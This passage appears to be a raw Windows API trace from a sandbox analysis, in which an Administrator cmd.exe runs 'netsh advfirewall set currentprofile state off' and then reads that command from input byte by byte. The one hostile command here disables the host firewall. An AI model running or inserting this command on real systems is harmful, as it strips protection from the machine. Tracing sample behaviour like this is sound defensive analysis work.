0x2f5bf0 [0124.440] GetProcessHeap () returned 0x2e0000 [0124.440] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f5bf0, Size=0x7e) returned 0x2f5bf0 [0124.440] GetProcessHeap () returned 0x2e0000 [0124.440] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f5bf0) returned 0x7e [0124.441] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.441] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x20ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee70) returned 0x2f5c80 [0124.441] GetProcessHeap () returned 0x2e0000 [0124.441] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x28) returned 0x2f4640 [0124.441] FindClose (in: hFindFile=0x2f5c80 | out: hFindFile=0x2f5c80) returned 1 [0124.441] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x20ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee70) returned 0xffffffffffffffff [0124.442] GetLastError () returned 0x2 [0124.442] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee70) returned 0x2f5c80 [0124.442] GetProcessHeap () returned 0x2e0000 [0124.442] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f4640, Size=0x8) returned 0x2f8900 [0124.442] FindClose (in: hFindFile=0x2f5c80 | out: hFindFile=0x2f5c80) returned 1 [0124.442] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0124.442] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0124.442] GetConsoleTitleW (in: lpConsoleTitle=0x20f3c0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.442] GetProcessHeap () returned 0x2e0000 [0124.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x21c) returned 0x2fb2a0 [0124.442] GetConsoleTitleW (in: lpConsoleTitle=0x2fb2b0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.442] GetProcessHeap () returned 0x2e0000 [0124.442] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb2a0, Size=0xd6) returned 0x2fb2a0 [0124.442] GetProcessHeap () returned 0x2e0000 [0124.442] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb2a0) returned 0xd6 [0124.442] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - netsh advfirewall set currentprofile state off") returned 1 [0124.443] GetProcessHeap () returned 0x2e0000 [0124.443] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb2a0 | out: hHeap=0x2e0000) returned 1 [0124.443] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f178, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f138 | out: lpAttributeList=0x20f178, lpSize=0x20f138) returned 1 [0124.443] UpdateProcThreadAttribute (in: lpAttributeList=0x20f178, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f128, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f178, lpPreviousValue=0x0) returned 1 [0124.443] GetStartupInfoW (in: lpStartupInfo=0x20f290 | out: lpStartupInfo=0x20f290*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xac, hStdOutput=0xb8, hStdError=0xb8)) [0124.443] GetProcessHeap () returned 0x2e0000 [0124.443] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4640 [0124.443] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0124.443] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0124.443] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0124.443] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.444] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.444] GetProcessHeap () returned 0x2e0000 [0124.444] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0124.444] GetProcessHeap () returned 0x2e0000 [0124.445] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f5c80 [0124.445] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\netsh.exe", lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x20f1b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="netsh advfirewall set currentprofile state off", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f160 | out: lpCommandLine="netsh advfirewall set currentprofile state off", lpProcessInformation=0x20f160*(hProcess=0x54, hThread=0x50, dwProcessId=0x32c, dwThreadId=0x5f0)) returned 1 [0124.470] CloseHandle (hObject=0x50) returned 1 [0124.470] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0124.470] GetProcessHeap () returned 0x2e0000 [0124.470] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8a60 | out: hHeap=0x2e0000) returned 1 [0124.470] GetEnvironmentStringsW () returned 0x2f8a60* [0124.471] GetProcessHeap () returned 0x2e0000 [0124.471] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xac4) returned 0x2fb2a0 [0124.471] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0124.471] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76d30000 [0124.471] GetProcAddress (hModule=0x76d30000, lpProcName="NtQueryInformationProcess") returned 0x76d814a0 [0124.471] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x20ea68, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x20ea68, ReturnLength=0x0) returned 0x0 [0124.471] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdd000, lpBuffer=0x20eaa0, nSize=0x380, lpNumberOfBytesRead=0x20ea60 | out: lpBuffer=0x20eaa0*, lpNumberOfBytesRead=0x20ea60*=0x380) returned 1 [0124.471] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0173.860] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x20f0a8 | out: lpExitCode=0x20f0a8*=0x0) returned 1 [0173.860] CloseHandle (hObject=0x54) returned 1 [0173.860] _vsnwprintf (in: _Buffer=0x20f318, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f0b8 | out: _Buffer="00000000") returned 8 [0173.860] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0173.860] GetProcessHeap () returned 0x2e0000 [0173.860] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb2a0 | out: hHeap=0x2e0000) returned 1 [0173.860] GetEnvironmentStringsW () returned 0x2fe870* [0173.860] GetProcessHeap () returned 0x2e0000 [0173.860] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2ff370 [0173.860] FreeEnvironmentStringsW (penv=0x2fe870) returned 1 [0173.860] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0173.860] GetProcessHeap () returned 0x2e0000 [0173.860] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2ff370 | out: hHeap=0x2e0000) returned 1 [0173.861] GetEnvironmentStringsW () returned 0x2fe870* [0173.861] GetProcessHeap () returned 0x2e0000 [0173.861] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2ff370 [0173.861] FreeEnvironmentStringsW (penv=0x2fe870) returned 1 [0173.861] GetProcessHeap () returned 0x2e0000 [0173.861] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5c80 | out: hHeap=0x2e0000) returned 1 [0173.861] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f178 | out: lpAttributeList=0x20f178) [0173.861] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0173.861] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.861] SetConsoleMode (hConsoleHandle=0xb8, dwMode=0x0) returned 0 [0173.862] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.862] GetConsoleMode (in: hConsoleHandle=0xb8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0173.862] _get_osfhandle (_FileHandle=0) returned 0xac [0173.862] GetConsoleMode (in: hConsoleHandle=0xac, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0173.862] GetConsoleOutputCP () returned 0x1b5 [0173.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0173.862] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0173.862] GetProcessHeap () returned 0x2e0000 [0173.862] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5bf0 | out: hHeap=0x2e0000) returned 1 [0173.862] GetProcessHeap () returned 0x2e0000 [0173.862] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9cf0 | out: hHeap=0x2e0000) returned 1 [0173.862] GetProcessHeap () returned 0x2e0000 [0173.862] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0173.862] GetProcessHeap () returned 0x2e0000 [0173.862] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb240 | out: hHeap=0x2e0000) returned 1 [0173.862] GetProcessHeap () returned 0x2e0000 [0173.862] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5b70 | out: hHeap=0x2e0000) returned 1 [0173.863] GetProcessHeap () returned 0x2e0000 [0173.863] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0173.863] GetProcessHeap () returned 0x2e0000 [0173.863] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9880 | out: hHeap=0x2e0000) returned 1 [0173.863] GetProcessHeap () returned 0x2e0000 [0173.863] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4610 | out: hHeap=0x2e0000) returned 1 [0173.863] GetProcessHeap () returned 0x2e0000 [0173.863] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f97c0 | out: hHeap=0x2e0000) returned 1 [0173.863] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x20f5d8 | out: _Buffer="\r\n") returned 2 [0173.863] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.863] GetFileType (hFile=0xb8) returned 0x3 [0173.863] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.863] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0173.863] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f5a8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f5a8*=0x2, lpOverlapped=0x0) returned 1 [0173.863] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0173.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0173.863] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x20f5e8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0173.863] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x20f5e8 | out: _Buffer=">") returned 1 [0173.863] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.863] GetFileType (hFile=0xb8) returned 0x3 [0173.863] _get_osfhandle (_FileHandle=1) returned 0xb8 [0173.863] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0173.863] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x20f5d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f5d8*=0x14, lpOverlapped=0x0) returned 1 [0173.864] _get_osfhandle (_FileHandle=0) returned 0xac [0173.864] GetFileType (hFile=0xac) returned 0x3 [0173.864] _get_osfhandle (_FileHandle=0) returned 0xac [0173.864] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.864] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.864] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="netsh advfirewall set currentprofile state off\n") returned 1 [0173.864] _get_osfhandle (_FileHandle=0) returned 0xac [0173.864] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.864] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.864] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="etsh advfirewall set currentprofile state off\n") returned 1 [0173.864] _get_osfhandle (_FileHandle=0) returned 0xac [0173.864] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.864] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.864] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="tsh advfirewall set currentprofile state off\n") returned 1 [0173.864] _get_osfhandle (_FileHandle=0) returned 0xac [0173.864] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.864] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.864] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="sh advfirewall set currentprofile state off\n") returned 1 [0173.864] _get_osfhandle (_FileHandle=0) returned 0xac [0173.864] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.864] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.864] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr="h advfirewall set currentprofile state off\n") returned 1 [0173.864] _get_osfhandle (_FileHandle=0) returned 0xac [0173.864] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.864] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.864] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32a, cchWideChar=1 | out: lpWideCharStr=" advfirewall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.865] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.865] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.865] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32c, cchWideChar=1 | out: lpWideCharStr="fdvfirewall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.865] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.865] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.865] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32e, cchWideChar=1 | out: lpWideCharStr="ivfirewall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.865] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.865] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.865] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e330, cchWideChar=1 | out: lpWideCharStr="rfirewall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.865] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.865] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.865] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e332, cchWideChar=1 | out: lpWideCharStr="eirewall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.865] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.865] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.865] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e334, cchWideChar=1 | out: lpWideCharStr="wrewall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.865] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.865] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.865] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e336, cchWideChar=1 | out: lpWideCharStr="aewall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.865] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.865] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.865] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e338, cchWideChar=1 | out: lpWideCharStr="lwall set currentprofile state off\n") returned 1 [0173.865] _get_osfhandle (_FileHandle=0) returned 0xac [0173.866] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.866] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0173.866] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33a, cchWideChar=1 | out: lpWideCharStr="lall set currentprofile state off\n") returned 1 [0173.866] _get_osfhandle (_FileHandle=0) returned 0xac [0173.866] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0173.866] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, 